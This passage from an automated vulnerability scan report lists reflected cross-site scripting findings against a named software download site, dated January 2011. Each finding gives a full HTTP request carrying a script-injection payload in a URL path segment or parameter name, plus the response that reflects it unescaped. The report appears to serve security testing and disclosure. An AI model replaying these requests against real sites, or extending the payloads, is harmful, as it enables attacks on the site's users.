Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57837


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-pidgin-download-kkwthbed.html?c708f"><script>alert(1)</script>5f593c9e2bd=1"/>
...[SNIP]...

4.1759. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b9e"><script>alert(1)</script>b57549acbe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsb3b9e"><script>alert(1)</script>b57549acbe3/t-64-bit-rss-reader-download-avwkinlm.html" />
...[SNIP]...

4.1760. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e04"><script>alert(1)</script>80ff2e869b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.htmlc5e04"><script>alert(1)</script>80ff2e869b2"/>
...[SNIP]...

4.1761. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65e"><script>alert(1)</script>1c166d61bb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-rss-reader-download-avwkinlm.html?5b65e"><script>alert(1)</script>1c166d61bb7=1"/>
...[SNIP]...

4.1762. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18719"><script>alert(1)</script>ee7861559ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads18719"><script>alert(1)</script>ee7861559ed/t-64-bit-skype-download-szhzvwoz.html" />
...[SNIP]...

4.1763. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f95"><script>alert(1)</script>c335ecb6c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html75f95"><script>alert(1)</script>c335ecb6c9b"/>
...[SNIP]...

4.1764. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec64"><script>alert(1)</script>d5da7e23d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57897


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-skype-download-szhzvwoz.html?1ec64"><script>alert(1)</script>d5da7e23d0e=1"/>
...[SNIP]...

4.1765. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39331"><script>alert(1)</script>831ea6de695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads39331"><script>alert(1)</script>831ea6de695/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html" />
...[SNIP]...

4.1766. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b2f"><script>alert(1)</script>30e728f96c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.htmld9b2f"><script>alert(1)</script>30e728f96c4"/>
...[SNIP]...

4.1767. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65876"><script>alert(1)</script>0527961b680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html?65876"><script>alert(1)</script>0527961b680=1"/>
...[SNIP]...

4.1768. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85299"><script>alert(1)</script>d551f5477b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads85299"><script>alert(1)</script>d551f5477b5/t-64-bit-teamspeak-download-opmulwsy.html" />
...[SNIP]...

4.1769. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75347"><script>alert(1)</script>3f02c20ef7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c"/>
...[SNIP]...

4.1770. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade4"><script>alert(1)</script>9b2e7ce64af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1"/>
...[SNIP]...

4.1771. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9e"><script>alert(1)</script>2068dbf1796 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

4.1772. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d1"><script>alert(1)</script>b29de778e85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85"/>
...[SNIP]...

4.1773. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4317f"><script>alert(1)</script>f5492ba1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1"/>
...[SNIP]...

4.1774. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a5"><script>alert(1)</script>39fb5dff735 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html" />
...[SNIP]...

4.1775. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c06d"><script>alert(1)</script>7dbfa7985a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
